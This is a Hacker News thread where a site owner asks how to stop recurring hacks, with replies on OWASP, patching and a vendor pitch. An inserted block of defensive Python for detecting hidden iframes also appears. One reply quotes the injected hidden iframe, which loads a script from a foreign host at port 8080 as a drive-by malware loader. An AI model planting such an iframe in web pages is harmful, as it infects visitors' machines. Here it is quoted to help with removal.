

Ask HN: What is the best way to protect your website from hackers? - ujjwalg

I have a website which was on GoDaddy servers and got hacked. A warning message used to show up whenever anyone visited the site. I moved the servers to Mosso (forwarded from GoDaddy) and after about a month the website is hacked again and the same warning message has started showing up. I am willing to pay a minimal amount on a monthly basis to deal with hacking permanently or do whatever is necessary. Any comments, suggestions, experience will be appreciated. Thanks.
======
kierank
Remove the following iframe from your homepage:

    <iframe src="http://bestwebfind.cn:8080/ts/in.cgi?pepsi11" width=2 height=4 style="visibility: hidden"></iframe>

~~~
ujjwalg
I have tried removing it, but it comes back again. The best way to deal with
hackers that most people are suggesting is to move to Linux-based servers
rather than Windows-based ones. So we are probably going to try that.
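
An added example, not part of any comment in this thread: because the injected iframe is reported to return after removal, a recurring check of the served HTML can flag it each time it reappears. The sketch assumes that a frame which is both concealed (hidden style or a few pixels in size) and loaded from a host outside your own list is suspicious; `audit_html`, the pixel threshold and the sample hosts are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"(visibility\s*:\s*hidden|display\s*:\s*none)", re.I)
MAX_VISIBLE_PX = 10  # assumption: a frame this small is not meant to be seen
# Constructed sample page: one ordinary embed, one concealed off-site frame.
SAMPLE = """<html><body>
<h1>Shop</h1>
<iframe src="https://video.example/embed/abc" width="560" height="315"></iframe>
<iframe src="http://injected.example:8080/in.cgi?x" width=2 height=4 style="visibility: hidden"></iframe>
</body></html>
"""

def _tiny(value):
    """True when a width/height attribute is a pixel count at or below the threshold."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= MAX_VISIBLE_PX

class IframeAuditor(HTMLParser):
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []  # (line number, src, reasons)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("tiny-size")
        if host and host not in self.own_hosts:
            reasons.append("foreign-host")
        # Report only frames that are both concealed and off-site.
        if "foreign-host" in reasons and len(reasons) > 1:
            self.findings.append((self.getpos()[0], a.get("src", ""), reasons))

def audit_html(text, own_hosts):
    """Return findings for one HTML document; own_hosts lists the site's own hostnames."""
    auditor = IframeAuditor(own_hosts)
    auditor.feed(text)
    auditor.close()
    return auditor.findings
```

Running this over every page and template on a schedule only detects reinfection; the frame will keep returning until the flaw or stolen credential used to write it is fixed.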

------
khafra
As asked, the question has no single answer. Security is a continual process,
and a tradeoff with speed, usability, friendliness, bandwidth, etc.

The 100% secure website is one without an internet connection. The 99% secure
website is one on a continually patched server, offering only static content,
and accepting no user-supplied input other than the base url and clicks on
links.

If you want to accept user input and serve dynamic content, it becomes a
complicated process involving, at minimum, awareness of your own
vulnerabilities and threats, and protection against the OWASP Top 10 and
similar lists.

*1. <http://www.owasp.org/index.php/Top_10_2007>

~~~
ujjwalg
Thanks for the input. My website accepts user input (registration, feedback,
forums, payment for buying products etc.) and serves dynamic content. I am not
a developer myself but have hired someone for development. It seems I will
need to hire/subscribe to a service which can provide me with the necessary
expertise.

------
mg1313
You might be having problems with your software, not the hosting. If you use a
blog, read about these security measures:
[http://www.mytestbox.com/news/secure-wordpress-blog-prevent-...](http://www.mytestbox.com/news/secure-wordpress-blog-prevent-hacking-tips-tricks/)

------
Mistone
My day job is at McAfee; we sell the leading web security testing service
(mcafeesecure.com). It runs a daily scan on your full website infrastructure,
finding the vulnerabilities hackers are exploiting to access your site and
showing you how to fix them. It's a solid service, used by 75% of the web's top
500 retailers and thousands of businesses worldwide. If you're interested in the
service, contact me (email in profile).

------
Mistone
I clicked through to the site from ujjwalg's profile and my browser crashed
immediately. Now I'm getting an endless stream of warning messages from my
anti-virus regarding programs trying to access my computer, including a
trojan. Wow, pretty hectic.

The domain is watermelonexpress.com; avoid it like the plague.

------
ErrantX
This suggests the security flaw is with your site code, not the hosting
provider :)

What tech/code does your site run on?

